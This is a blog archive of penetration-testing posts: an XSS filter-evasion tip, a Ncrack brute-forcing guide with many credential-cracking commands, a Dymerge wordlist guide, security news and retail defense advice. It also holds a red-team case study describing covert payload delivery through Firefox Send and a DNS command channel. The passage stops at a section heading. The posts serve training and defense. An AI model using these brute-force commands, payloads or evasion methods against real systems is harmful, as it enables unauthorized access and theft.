Category Archives: penetration testing

Professionally Evil Insights: Twelve Days of XSSmas

This series of daily mini-posts, running from December 12, 2018 to December 24, 2018, is intended to provide cross-site scripting (XSS) related tips. This will range from filter-evasion and payload minification tricks, to old (but still good) classic XSS tips, to scripts that make (or contribute to) interesting proof-of-concept payloads.

Day 1

When building payloads to exploit Cross-Site Scripting (XSS) space is often at a premium.  Or we are trying to bypass controls attempting to prevent the exact attack we are trying to pull off.  Template literals are a newer addition to JavaScript. But they’re not just for string interpolation. Those backticks are also useful for filter evasion and payload minification. A simple example:

alert`xss`

Saves two characters and eliminates the need for single or double quotes.

Come back tomorrow for the next tip in the Twelve Days of XSSmas

 

Upcoming Events by Secure Ideas



Professionally Evil Insights

Professionally Evil Insights: Professionally Evil CISSP Certification: Breaking the Bootcamp Model

ISC2 describes the CISSP as a way to prove “you have what it takes to effectively design, implement and manage a best-in-class cybersecurity program”.  It is one of the primary certifications used as a stepping stone in your cybersecurity career.   Traditionally, students have two different options to gain this certification; self-study or a bootcamp.  Both of these options have pros and cons, but neither is the best.

Bootcamps are a popular way to cram for the certification test.  Students spend five days in total immersion into the topics of the CBK.  This is an easy way to pass the exam for lots of students because it focuses them on the CISSP study materials for the bootcamp timeframe.  But there are a few negatives to this model.  First is the significant cost.  The typical prices we see are between $3500 and 5000 with outliers as high as almost $7000.  The second issue is that it takes the student away from their life for the week.  Finally, most people finish the bootcamp with the knowledge to pass the exam but since it is crammed in, they quickly forget most of the information.

Self-Study is the other common mechanism for studying for the CISSP exam.  This allows a dedicated student to learn the information at their pace and time frame.  It also allows for them to decide how much to spend.  From books to online videos and practice exams the costs vary.  The main problem with the method is that students often get distracted by life and work while trying to accomplish it.

But there is an answer that combines the benefits of both previous options.  Secure Ideas has developed a mentorship program designed to provide the knowledge necessary to pass the certification, while working through the common body of knowledge (CBK).  All done in a manner that encourages retention of the knowledge.  And it is #affordabletraining!

The mentorship program is designed as a series of weekly mentor led discussion and review sessions along with various student support and communication methods, spanning a total of 9 weeks.  These work together to provide the student a solid foundation to not only help in passing the certification but to continue as a collection of information for everyday work.   This class is set up to cover the 8 domains of the ISC2 CBK:

  • Security and Risk Management
  • Asset Security
  • Security Architecture and Engineering
  • Communication and Network Security
  • Identity and Access Management (IAM)
  • Security Assessment and Testing
  • Security Operations
  • Software Development Security

The Professionally Evil CISSP Mentorship program uses multiple communication and knowledge sharing paths to build a comprehensive learning environment focused on both passing the CISSP certification and gaining a deep understanding of the CBK.

The program consists of the following parts:

  • Official study guide book
  • Weekly live session with instructor(s)
    • Live session will also be recorded
  • Private Slack team for students and instructors to communicate regularly
  • Practice exams
  • While we believe students will pass on their first try, we also include the option for students to take the program as many times as they want, any time we offer it.  🙂

You can sign up for the course over at https://attendee.gototraining.com/r/2538511060126445313 for only $1000.  Our early bird pricing is $800 and is good until January 31.  Just use the Coupon code EARLYBIRD at checkout.  Veterans, active duty military and first responders also get a significant discount.  Email info@secureideas.com for more information.



Professionally Evil Insights

How can businesses get the most out of pentesting?

More than 4.5 billion data records were compromised in the first half of this year. If you still feel like your enterprise is secure after reading that statistic, you’re one of the few. Hackers utilizing high-profile exploits to victimize organizations is becoming an almost daily occurrence, with 18,000 to 19,000 new vulnerabilities estimated to show up in 2018. Here’s the thing though – we can still address the situation and make the current threat landscape … More

The post How can businesses get the most out of pentesting? appeared first on Help Net Security.

Comprehensive Guide on Ncrack – A Brute Forcing Tool

In this article we will be exploring the topic of network authentication using Ncrack. Security professionals depends on Ncrack while auditing their clients. The tools is very simple, yet robust in what it offers a penetration tester. It was design to help the companies in securing their networks by analysis all their hosts and networking devices for weak passwords.

Table of Content

Introduction to Ncrack

  • Exploring Modules

Authentication Phase

  • Basic Attack
  • Dictionary Attack
  • Brute Force Attack
  • Pairwise Attack

Misc Phase

  • Resume the Attack
  • Stop on Success
  • Obtain Result in List Format

Output Format

  • Normal text File
  • All Format At Once
  • Append output
  • Nsock Trace

Timing and Performance

  • Timing Templates
  • Service-Specific Options

Target Specification

  • Input from Nmap’s XML
  • Input from Text file
  • Exclude Host from List 

Introduction to Ncrack

Ncrack is a network authentication tool, it helps pentesters find out how vulnerable the credentials protecting a network’s access are. The tool is a part of the Kali Linux arsenal and comes preinstalled with the package. It also has a unique feature to attack multiple targets at once, which is not seen very often in such tools.

Ncrack can be started by typing “ncrack” in the terminal. This shows us all the different options the tool provides us.

ncrack

syntax: ncrack [Options] {target:service specification/port number}

Exploring Modules

Ncrack is a very versatile tool, it has modules to test most of the popular forms of network authentication. We can see this by checking the modules.

ncrack –V

Authentication Phase

Basic Attack

We have define this attack as basic because at this phase we only know that port 21 is enable for FTP service on victim’s machine. So with the help of the following command we will try to find out possible FTP login credential.

ncrack ftp://192.168.0.105

On executing above command it will try to crack password for anonymous login account as shown in the given below image.

 Dictionary Attack

Suppose you are willing to obtain correct login credential for any account such FTP, SSH or HTTP when you having following situations:

 Situation1- Know only username but don’t know the password

Situation2- Don’t know username but know the password

Situation3- Neither have username nor the password

In such situation, you should use a wordlist dictionary and then go with ncrack command respectively:

ncrack -user msfadmin -P pass.txt 192.168.0.105:21

ncrack -U user.txt -pass msfadmin 192.168.0.105:21

ncrack -U user.txt -P pass.txt 192.168.0.105:21

Brute Force Attack

Now whenever you consider yourself in following situations:

Suitation1- Close assumption of few usernames and passwords for any host:service and don’t want to use dictionary then you can go with following command, this will reduce our effort of guessing truthful credential.

ncrack -user msfadmin,ignite -pass msfadmin,123 ftp://192.168.0.106

Suitation2- Close assumption of usernames and passwords but there multiple hosts in a network and guessing valid login for destination machine is much time taken process.

Again with the help of ncrack following command you will be able to crack valid login for any host present in the network.

ncrack -user msfadmin,ignite -pass msfadmin,123 192.168.0.1/24:21

Pairwise Attack

Ncarck lets us choose sets of credentials, basically pairing them in row and column index which mean 1st username from user.txt file will pair with 1st password of pass.txt file.

If you are not giving any dictionary, then ncrack will go with its default dictionary for pairing password for anonymous login.

ncrack -v –pairwise 192.168.0.105:21

From the given below image you can observe that we had made successful FTP login with the help of paired password matthew.

Misc Phase

Resume the Attack

This is probably the feature that takes the cake. We all know how frustrating the loss of connection or any other technical interruption can be during testing, this is where Ncrack is blessing. If your attack gets interrupted, you can pick it right up from where you were.

ncrack –resume /root/.ncrack/restore.2018-12-05_04-36

Stop on Success

As you have seen in above attack that it keep on cracking the service until it finds the all possible logins but if you want that, the attack should quit cracking service after finding one credential then you should add -f option in the ncrack command.

ncrack -v –pairwise 192.168.0.105:21-f

Obtain Result in List Format

It always matter that how will you maintain your penetration testing report and output result while presenting them. Sometime it is quite hectic to arrange the result in well polish look especially at that time when you have to penetrate multiple host machine. To shoot such hotchpotch, the ncrack has added -sL option which will generate result in a list format.

ncrack ssh://192.168.0.105 ssh://192.168.0.106 -sL

Output Format

Normal text File

If you want to store the output of ncrack result in a Text/XML format.

Then you can go with -oN option to save the result in a text file with the help of given below command and later can use cat command to read the information saved inside that file.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oN normal.txt

cat normal.txt

Or you can switch to –oX option to save the output result in XML format.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oX save.xml

 All Format At Once

Suppose you want to store the output of ncrack result in both format (.txt, .xml) then you can choose -oA option while executing command.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oA output

As you can observe that it has stored the result in two format as “output.ncrack” and “output.xml”.

Append output

If the testing is being done in iterations, Ncrack gives us the option to append or add the output to an existing file with ease.

As you can observe that when we try to crack ftp service for host: 192.168.0.106, it gives ignite:123 as login credential that I had save in a text file.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.106:21 -oN normal.txt

But on crack SMB service for host: 192.168.0.105, it gives msfadmin:msfadmin as login credential and here I had append the output in previous text file.

ncrack -U user.txt -P pass.txt 192.168.0.105:445 -oN normal.txt –append-output

Conclusion: so by reading normal.txt file we got both output result at one place rather than clobber specified output files.

Nsock Trace

Ncarck lets us run nsock trace on our target while attacking it, we can set the trace level anywhere from 0 to 10 depending on our objective. The output from this operation is quite large.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 –nsock-trace 2

We weren’t kidding when we said the output is large!

Timing and Performance

Timing Templates

Timing template in ncrack is defined by –T<0-5> having -T0 as the slowest and –T5 as the fastest. By default all ncrack scans run on –T3 timing template. Timing template in Ncrack is used to optimize and improve the quality and performance of scan to get desired results.

T5: Insane Scan

T4: Aggressive Scan

T3: Normal Scan

T2: Polite Scan

T1: Sneaky Scan

ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T1

As you can observe from the given below image that it took 187.57 seconds and for this reason T0 and T1 is use to evade from firewall and IDS/IPS.

ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T5

ncrack -U user.txt -P pass.txt 192.168.0.105:21

On executing above command you can comparing the time of completing the process in both result, it took 15.01 seconds during T5 and 24.00 second during default (T3).

Service-Specific Options

cl (min connection limit): minimum number of concurrent parallel connections

CL (max connection limit): maximum number of concurrent parallel connections

at (authentication tries): authentication attempts per connection

cd (connection delay): delay <time> between each connection initiation

cr (connection retries): caps number of service connection attempts

to (time-out): maximum cracking <time> for service, regardless of success so far

You can use above option while penetrating whole network for cracking any service.

ncrack ssh://192.168.0.105 -m ftp:cl=10,CL=30,at=5,cd=2ms,cr=10,to=2ms -sL -d

Target Specification

Input from Nmap’s XML

You might be aware of Nmap tool its functionality, suppose while scanning network with the help of nmap you have stored its result in xml format then you can use ncrack -iX option to crack the running services with the help of xml file format.

ncrack -user ignite -pass 123 -iX nmap.xml

As you can observe from the given image that ncrack itself, cracked the password for FTP without specifying any service or port in the command.

Input from Text file

Executing command again and again on multiple host is quite time consuming efforts, therefore, you can place all host IP in a text file and then use it for cracking any particular service.

ncrack -U user.txt -P pass.txt -iL host.txt -p21

Exclude Host from List

Suppose you are using a list that contains multiple IP or range of IP and you don’t want to crack service for a specific IP then you can use –exclude option to eliminate that particular IP from list of hosts.

 ncrack -U user.txt -P pass.txt -iL host.txt -p21 –exclude 192.168.0.106

As you can observe, this time it does not crack for 192.168.0.106 and shown the result for the remaining IP.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contachere

The post Comprehensive Guide on Ncrack – A Brute Forcing Tool appeared first on Hacking Articles.

Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool

Takuya Yoshida from Toyota’s InfoTechnology Center and his colleague Tsuyoshi Toyama are members of a Toyota team that developed the new tool, called PASTA (Portable Automotive Security Testbed).

PASTA is an open-source testing platform specifically designed for car hacking, it was developed to help experts to test cyber security features of modern vehicles.

At the BLACK HAT EUROPE 2018 held in London the duo presented the tool and confirmed that  Toyota plans to share the specifications on Github and will start selling the fully built system in Japan.

The PASTA car hacking tool is contained in an 8 kg portable briefcase, experts highlighted the delay of the automotive industry in developing cyber security for modern cars.

“The researchers integrated the tool with a driving simulator program, as well as with a model car to demonstrate some ways it can be used. PASTA also can be used for R&D purposes with real vehicles: that would allow a carmaker to test how a third party feature would affect the vehicle and its security, or reprogram firmware, for example.” reported DarkReading.

PASTA

Source: Dark Reading

Giving a close look at pasta case, we can find four ECUs inside, as well as a console to run tests of the car system operation or to carry out attacks, for example injecting CAN messages.

“There was a delay in the development of cybersecurity in the automobile industry; [it’s] late,” explained Toyama.

Now automakers including Toyota are preparing for next-generation attacks, he said, but there remains a lack of security engineers that understand auto technology.

The tool allows researchers to test communications among components of the vehicle through CAN protocol as well as analyzed engine control units (ECUs) operate of the vehicles.

Watch out, the PASTA was not designed for hacking scenarios like the one presented by the security duo Charlie Miller and Chris Valasek in 2015 when they remotely hacked a Fiat Chrysler connected car.

PASTA implements a simulation for remote operation of vehicle components and features, including wheels, brakes, windows, and other car functionalities.

“It’s small and portable so users can study, research, and hack with it anywhere.” continues the expert.

PASTA supports connections to ODBII, RS232C ports, and a port for debugging or binary hacking.

“You can modify the programming of ECUs in C” as well, he said.

Among future improvements for PASTA there is the implementation of other connectivity features, including Ethernet, LIN, and CAN FD, Wi-Fi and of course Bluetooth.

You can download slides and the research paper from the following link:

• Download Presentation Slides
• Download White Paper

Pierluigi Paganini

(Security Affairs – car hacking, PASTA)

The post Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool appeared first on Security Affairs.

5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays

This is the second article in a two-part series about retail cybersecurity during the holidays. Read part one for the full list of recommendations.

The holiday shopping season offers myriad opportunities for threat actors to exploit human nature and piggyback on the rush to buy and sell products in massive quantities online. Our previous post covered some network security basics for retailers. Let’s take a closer look at how retailers can properly configure and monitor their networks to help mitigate cyberattacks and provide customers with a safe shopping experience during the holiday season.

1. Take a Baseline Measurement of Your Network Traffic

Baselining is the process of measuring normal amounts of traffic over a period of days or even weeks to discern any suspicious traffic peaks or patterns that could reveal an evolving attack.

Network traffic measurements should be taken during regular business hours as well as after hours to cover the organization’s varying activity phases. As long as the initial baseline is taken during a period when traffic is normal, the data can be considered reliable. An intrusion detection system (IDS) or intrusion prevention system (IPS) can then assist with detecting abnormal traffic volumes — for example, when an intruder is exfiltrating large amounts of data when offices are closed.

Below are some factors to consider when performing a baseline measurement that could be helpful in detecting anomalies:

  • Baseline traffic on a regular basis.
  • Look for atypical traffic during both regular and irregular times (e.g., after hours).
  • Set alarms on an IDS/IPS for high and low thresholds to automate this process. Writing signatures specific to your company’s needs is a key element to an IDS/IPS working effectively and should be carried out by trained security specialists to avoid false alarms.
  • Investigate any discrepancies upon initial discovery and adjust thresholds accordingly.
  • Consider using an endpoint detection and response (EDR) solution to help security teams better identify threats, and to allow operations teams to remediate endpoints quickly and at scale.

Listen to the podcast: Examining the State of Retail Security

2. Run a Penetration Test Before It’s Too Late

A key preventative measure for retailers with a more mature security posture is running a penetration test. Simply put, the organization’s security team can allow a white hat hacker, or penetration tester, to manually try to compromise assets using the same tactics, techniques and procedures (TTPs) as criminal attackers. This is done to ascertain whether protections applied by the organization are indeed working as planned and to find any unknown vulnerabilities that could enable a criminal to compromise a high-value asset.

Manual testing should be performed in addition to automated scanning. Whereas automated tools can find known vulnerabilities, manual testing finds the unknown vulnerabilities that tools alone cannot find. Manual testing also targets the systems, pieces of information and vulnerabilities most appealing to an attacker, and specifically focuses on attempting to exploit not just technical vulnerabilities within a system, but business logic errors and other functionality that, when used improperly, can grant unintended access and/or expose sensitive data.

The key to a penetration test is to begin by assessing vulnerabilities and addressing as many of them as possible prior to the test. Then, after controls are in place, decide on the type of test to carry out. Will it be a black box test, where the testers receive no information about the target’s code and schematics? Or will it be a white box test, where organizations fully disclose information about the target to give the tester full knowledge of how the system or application is intended to work? Will it be in a very specific scope and only include customer-facing applications?

It can be helpful to scope a penetration test by taking the following three steps prior to launching the testing period:

  1. Establish goals for the testing. Since penetration testing is intended to simulate a real-world attack, consider scenarios that are relevant to your organization. Giving thought to what type of data is at risk or what type of attacker you’re trying to simulate will allow the testers to more closely approximate threats relevant to your organization.
  2. Draft a thorough contract to state the expectations and scope of the project. For example, if there are specific areas a penetration tester should not access based on criticality or sensitivity, such as production servers or credit card data, outline these points in the contract. Also, define whether the penetration testers should attempt to compromise both physical access and remote access to compromise networks, or if just one is preferred. Consider if you wish to have social engineering included within the test as well.
  3. Have the vendor and its employees sign nondisclosure agreements (NDAs) to keep their findings confidential and ensure their exclusive use by the organization.

Penetration testers from reputable companies are thoroughly vetted before being allowed to conduct these tests. The retail industry can benefit from this type of testing because it mimics the actions of a threat actor and can reveal specific weaknesses about an organization. It can even uncover deficiencies in staff training and operational procedures if social engineering is included within the scope of the testing.

3. Check Your Log Files for Anomalies

Log data collected by different systems throughout an organization is critical in investigating and responding to attacks. Bad actors know this and, if they manage to breach an organization and gain elevated privileges, will work to cover up their tracks by tampering with logs.

According to IBM X-Force Incident Response and Intelligence Services (IRIS) research, one of the most common tactics malicious actors employ is post-intrusion log manipulation. In looking to keep their actions concealed, attackers will attempt to manipulate or delete entries, or inject fake entries, from log files. Compromising the integrity of security logs can delay defenders’ efforts to find out about malicious activity. Additional controls and log monitoring can help security teams avoid this situation.

Below are some helpful tips and examples of security logs that must be checked to determine whether anything is out of the ordinary.

  • Are your logs being tampered with? Look for altered timestamps, missing entries, additional or duplicate entries, and anomalous login attempts.
  • Transfer old log files to a restricted zone on your network. This can help preserve the data and create space for logs being generated overnight.
  • Use a security information and event management (SIEM) tool to assist with analyzing logs and identifying anomalies reported by your organization’s security controls.
  • To include as many sources of information as possible, plug in endpoint, server, network, transaction and security logs for analysis by a SIEM system. Look for red flags such as multiple failed logins, denied access to sensitive areas, ping sweeps, etc.

Knowing which logs to investigate is also critical to successful log analysis. For example, point-of-sale (POS) systems are often installed on Microsoft Windows or Linux systems. It is therefore critical to review operating system logs for these particular endpoints. When it comes to POS networks, where many of the devices are decentralized, daily usage, security and application logs are good places to look for anomalies.

For network security, use logs from network appliances to determine failed or excessive login attempts, increases or decreases in traffic flow, and unauthorized access by users with inadequate privilege levels.

4. Balance Your Network and Website Traffic

According to the National Retail Federation, online sales from November and December 2017 generated more than $138.4 billion, topping 2016 sales by 11.5 percent. This year is likely going to set its own record. With internet traffic volumes expected to be at their highest, online retailers that are unprepared could see the loss of sales and damaged reputation in the aftermath of the holiday season.

But preparing for extra shoppers is the least of retailers’ worries; attackers may take advantage of the festive time of year to extort money by launching distributed denial-of-service (DDoS) attacks against retail websites. These attacks work by flooding a website or network with more traffic than it can handle, causing it to cease accepting requests and stop responding.

To stay ahead of such attacks, online retailers can opt to use designated controls such as load balancers. Load balancers are an integral part of preventing DDoS attacks, which can affect POS systems storewide. With a well-coordinated DDoS attack, a malicious actor could shut down large parts of their target’s networks.

One best practice is to prepare before traffic peaks. Below are some additional tips for a more balanced holiday season.

  • Preventing a DDoS attack can be an imposing undertaking, but with a load balancing device, most of this work can be automated.
  • Load balancers can be either hardware devices or virtual balancers that work to distribute traffic as efficiently as possible and route it to the server or node that can best serve the customer at that given moment. In cases of high traffic, it may take several load balancers to do the work, so evaluate and balance accordingly.
  • Load balancers can be programmed to direct traffic to servers dedicated to customer-facing traffic. Using them can also enable you to move traffic to the proper location instead of inadvertently allowing access to forbidden areas.

Load balancers are typically employed by larger companies with a prominent web footprint. However, smaller companies should still consider employing them because they serve a multitude of purposes. Keeping the load on your servers balanced can help network and website activity run smoothly year-round and prevent DDoS attacks from doing serious damage to your organization’s operations or web presence.

5. Plan and Practice Your Incident Response Strategy

An incident response (IR) plan is essential to identifying and recovering from a security incident. Security incidents should be investigated until they have been classified as true or false positives. The more timely and coordinated an organization’s response is to an incident, the faster it can limit and manage the impact. A solid IR plan can help contain an incident rapidly and result in better protection of customer data, reduction of breach costs and preservation of the organization’s reputation.

If your enterprise does not have an IR plan, now is the time to create one. In the event that your enterprise already has a plan, take the time to get key stakeholders together to review it and ensure it is up-to-date. Most importantly, test and drill the plan and document its effectiveness so you’re prepared for the attack scenarios most relevant to your organization.

When evaluating an IR plan, consider the following tips to help accelerate your organization’s response time:

  • Threat actors who compromise retail cybersecurity will typically turn stolen data around quickly for a profit on the dark web. Use dark web search tools to look for customer data that may have been compromised. Sometimes, data can be identified by the vendor that lost it, leading to the detection of an ongoing attack.
  • Before an attack occurs, establish a dedicated IR team with members from different departments in the organization.
  • Make sure each team member knows his or her precise role in the case of an incident.
  • Keep escalation charts and runbooks readily available to responders, and make sure copies are available offline and duplicated in different physical locations.
  • Test your IR strategy under pressure in an immersive cyberattack simulation to find out where the team is strong and what may still need some fine-tuning.

Make Retail Cybersecurity a Year-Round Priority

Increased vigilance is important for retailers during the holiday season, but these network security basics and practices can, and should, be maintained throughout the year. Remember, attackers don’t just wait until the holiday season to strike. With year-round preparation, security teams can mitigate the majority of threats that come their way.

Read the latest IBM X-Force Research

The post 5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays appeared first on Security Intelligence.

Post-exploitation scanning tool scavenges for useful information

Philip Pieterse, Principal Consultant for Trustwave’s SpiderLabs, has demonstrated at Black Hat Arsenal Europe 2018 a new tool for penetration testers called Scavenger. About Scavenger Scavenger is a multi-threaded post-exploitation scanning tool that helps penetration testers pinpoint files and folders that may provide the most “interesting” or useful information. “Scavenger confronts a challenging issue typically faced by penetration testing consultants during internal penetration tests: the issue of having too much access to too many systems … More

The post Post-exploitation scanning tool scavenges for useful information appeared first on Help Net Security.

What Type of Vulnerabilities Does a Penetration Test Look For?

Penetration testing is becoming increasingly popular as organizations are beginning to embrace the need for stronger cybersecurity. But there are still too many businesses that don’t fully understand the benefits of regular security testing. Pen testing is vital for any kind of organization with an IT system or website. A recent survey of penetration testers […]… Read More

The post What Type of Vulnerabilities Does a Penetration Test Look For? appeared first on The State of Security.

Comprehensive Guide on Dymerge

Hello friends! This article is comprehensive guide on the Dymerge tool. This is a handy little tool that helps you manage all the dictionaries that you’ve created reading through our blog and using all the amazing tools we’ve written about.

Table of Content

  • What is Dymerge
  • Installing and Launching Dymerge
  • Standard Merge
  • Fast Mode
  • Removing Duplicates
  • Reverse Listing
  • Alphabetic and Numeric Sorting
  • Defining Output
  • Including Characters
  • Compressing Output

Introduction to Dymerge

Dymerge is a tool that gives you the ability to manage dictionaries. By manage we mean it lets you gives the ability to reshape and merge them. Reshaping and merging may seem trivial but considering the fact that you could be dealing with millions of words, even the smallest of operation can turn into a mammoth and complicated task.

Installing and Launching Dymerge

We can install Dymerge from GitHub and launch it in two simple commands. We have used the “– h” flag to display the various options Dymerge has to offer.

git clone https://github.com/k4m4/dymerge.git
./dymerge.py

Standard Merge

We hope you have a few dictionaries handy to follow through with what we are doing. This a standard merge where we specify the paths to 2 different dictionaries and Dymerge combines them.

To avoid any confusion, the command is “./dymerge.py” followed by the path of the first dictionary, then a space and the path to the second dictionary. The output by default will be in a file named “dymerged.txt

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt

Fast Mode

Arguably if the dictionaries are very large, performing any operation on them will take time. The person who made Dymerge thought of this conundrum and gave us a way to speed up the process by using the “-f” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -f

Removing Duplicates

A lot of the dictionary making software’s follow the same logic, so there are bound to be similar words from time to time. Dymerge gives us the option to remove duplicate words from dictionaries while combining them. To achieve this, we will be using the “-u” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -u -f

Reverse Listing

Dymerge gives us the option to reverse the order of the words in the dictionaries that we merge, this mean that the first word in the new dictionary will be last word of the second dictionary.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -r –f

Alphabetic and Numeric Sorting

This option lets us sort words alphabetically, it also sorts numbers by following the progression of a number line from left to right when merging 2 dictionaries to 1. We will be using the “-s” flag to perform this operation.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s –f

Defining Output

So far we have been letting Dymerge save the output using it’s default settings, this time we will define the file name and destination of the output by using the “-o” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -o /root/output.txt

Including Characters

Just in case we find that we need something specific added to the dictionary, we can use the “-I” flag. Any characters placed after using the include flag are added to the dictionary.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -i raj

And here we see “raj” being added to the dictionary.

Compressing Output

Dictionaries can be pretty big in size, especially when you’re talking about a unified dictionary comprised of multiple dictionaries. Dymerge gives us the option to compress our output using the “-z” flag.

./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f –z zip

All said and done, this is a pretty neat little tool to use when you’re dealing with multiple dictionaries and need something to bring a little bit of order. The functions it performs may seem simple of the face of it but are without a doubt very useful.

Stay tuned for more articles on the latest and greatest in hacking.

Author: Shubham Sharma is a Cyber security enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post Comprehensive Guide on Dymerge appeared first on Hacking Articles.

Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red

As you may know, IBM X-Force Red is IBM Security’s penetration testing team. The team features professional, world-class testers who help organizations find and manage their security vulnerabilities on any and all platforms, including software and hardware devices. Our motto is “hack anything to protect everything.”

This post features a case study from IBM X-Force Red that shows how we ran into trouble on a black-box penetration testing assignment, worked against a well-prepared blue team, and overcame the obstacles to ultimately establish a solid adversarial operation. Let’s take a closer look at what we did to get through security and, more importantly, what your team can do to better secure your organization in an ever-evolving adversarial landscape.

A Tale of an Undeliverable Payload

On one of our red team’s recent engagements with a customer’s blue team, we were tasked with delivering a malicious payload to network users without setting off security controls or alerting the defensive team.

As a first attempt, we sent a phishing email to feel out the level of awareness on the other side. The email message was rigged with our malicious payload, for which we selected the attachment type and a lure that would appear credible. However, the blue team on the other side must have been lying in wait for suspicious activity. Every one of our emails was delivered, but our payloads were not. The payloads did not call home to the control server we had set up, and we started getting visits from the defensive team in the form of an anti-malware sandbox.

Within minutes, additional sandboxes hit on our command and control (C&C) server’s handler, and soon more than 12 security vendor clouds were feasting on the payload. We understood at that point that our payload had been detected, analyzed and widely shared by the blue team, but since this was a black-box operation, we had little way of knowing what went wrong after sending out our rigged emails.

If the Phish Fails, Send in the Fox

Going back to the drawing board, we realized that we must have triggered the blue team’s dynamic malware detection systems and controls. We had to find a new way to deliver the payload in a more concealed manner — preferably encrypted — and to have it detonate only when it reached its final destination to prevent premature discovery.

To do so, we had to overcome some hurdles, including:

  • Sidestepping traffic inspection controls;
  • Opening a siloed channel to send information from outside into the organizational networks;
  • Decreasing repeatable sampling of our externally hosted content;
  • Minimizing the chance of attribution at the initial visit/download/delivery stages; and
  • Bypassing URL inspections.

Some creative thinking summoned a good candidate to help us overcome most controls, mostly because it is a legitimate service that people use in daily interactions: Mozilla’s Firefox Send (FFSend).

Before we continue to describe the use of FFSend, we would like to note here that it is a legitimate tool that can be used safely, and that it was not compromised. We also disclosed information in this blog to Mozilla ahead of its publication and received the company’s support.

The Right Fox for the Job

FFSend is a legitimate file transfer tool from Mozilla. It has several interesting features that make it a great tool for users, and when files are sent through, its developers indicate it will generate “a safe, private and encrypted link that automatically expires to ensure your stuff does not remain online forever.” This makes FFSend a useful way to send private files between people in a secure manner.

To send a file, the sender, accessing FFSend via a browser, uploads the file he or she wants to share with the recipient through a simple web interface. He or she receives a URL for a shared link and can send it to the recipient. The recipient visits the shared link and downloads the file, at which point the FFSend service “forgets” the link and removes shared content from the server.

Red Team Research

Figure 1: Basic flow of events using FFSend

From our red team’s perspective, FFSend was a good fit for sending encrypted files. Let’s see how it answered some of the needs we defined.

FFSend allows for large file sizes up to 1 GB, which is large enough an allowance to both send a payload and exfiltrate data. This answered our need for a siloed, covert channel into the organization. It would encrypt and decrypt the payload for us with an AES-GCM algorithm directly in the internet browser, yet we won’t have to deal with any key generation or distribution. The payload would evade the inspection of intercepting proxies that can unwrap Transport Layer Security (TLS), and would remain private and won’t be shared with any party along the way, including Mozilla.

Red Team Payload Delivery

Figure 2: Schematic view of FFSend’s automated encryption

Since firefox.com is a trusted domain on most organizational controls, we gain yet another advantage by using FFSend. We won’t have to labor to set up a fake site that would raise suspicion, and we can still get our file’s link across to the recipient. The trusted Firefox domain is also more likely to slip through URL inspection and anti-phishing controls, as well as blacklists that organizations deploy to catch malicious content coming from rogue resources.

Red Team Research

Figure 3: FFSend is considered a trusted source

As for reducing repeated sampling of the payload, we get that as well by setting a strict one-time-only limit on the number of times our FFSend link can be accessed after it’s generated, avoiding the sandbox attempts and threat sharing. Moreover, FFSend automatically expires links after 24 hours, which effectively makes the path to our payload self-destruct if the target has not opened it. Self-destruction is also featured on FFSend’s application program interface (API), so it can also be ordered ad hoc after a link is sent but before its default expiration.

Red Team Research

Figure 4: FFSend’s link expiration and self-destruct schema

Avoiding attribution is also easier when using a legitimate service that implements ephemeral storage of the files it delivers. Using such a service allowed us to avoid any links back to our testers, since there was no account required to send a file, nor was information on the owner of the encrypted data sent, required or kept.

This meant our ownership of the malicious file would be anonymous, though there would still be a tie to our originating IP address and browser fingerprints. With most information concealed, we deemed this level of anonymity good enough for the desired outcome.

Red Team Payload Delivery

Figure 5: No sender identity required, no attribution links back to red team

Setting Up a Communications Channel

With the file sending issue resolved, we still needed a covert communication channel to help us establish an ongoing operation without being ousted by the blue team.

To set up a communications channel, we did not wish to start from scratch. We decided to use FFSend to make it work as the siloed, covert channel we needed. That was one problem solved, but to coordinate the sending and receiving of data over that channel, we would also need a side channel of communications to avoid inspection and detection.

Communication gets inspected by a number of security controls, so it is essential that we blend in with the environment. To do that, we would have to choose a communication protocol that would allow us to look like everyone else on the network. Looking at the typical choices — Hyper Text Transfer Protocol Secure (HTTPS), Internet Control Message Protocol (ICMP) and Domain Name System (DNS) protocols — we selected DNS for its decent packet capacity and overall better chance of blending in with legitimate user traffic.

DNS fit our need to implement a data channel to FFSend. Also, a command channel can offload to DNS. To make everything work together, DNS record content could be encrypted with the same FFSend shared key used to post the data link, keeping things consistent.

In our command protocol, we can accommodate short instructions and differentiate between the types of requests we want to task agents with, to run or receive responses on. For example, we can encode instructions such as fetch me <file> or execute <command>. The agent would then carry out the request and post the results over our FFSend data channel.

On the wire side, channel interaction will look like a well-formed dynamic DNS request, separate from an HTTPS channel used for data. This split would ensure avoiding traffic correlation.

The Foxtrot Control Server Rises

Once we knew how to set up our covert communications, we set up a rogue control server and named it Foxtrot. Foxtrot was a mechanism we used to facilitate communication between any number of the remote agents.

Having created Foxtrot with a modified FFSend service and a DNS side channel, IBM X-Force Red testers were able to push the initial payload to unsuspecting recipients. The payload circumvented dynamic defenses, helped our red team gain a foothold in the environment and established persistence to freely move data across intercepting proxies. We were also able to execute commands on compromised hosts, even when the defensive team had its security controls and monitoring turned on.

A Word to the Wise Defender

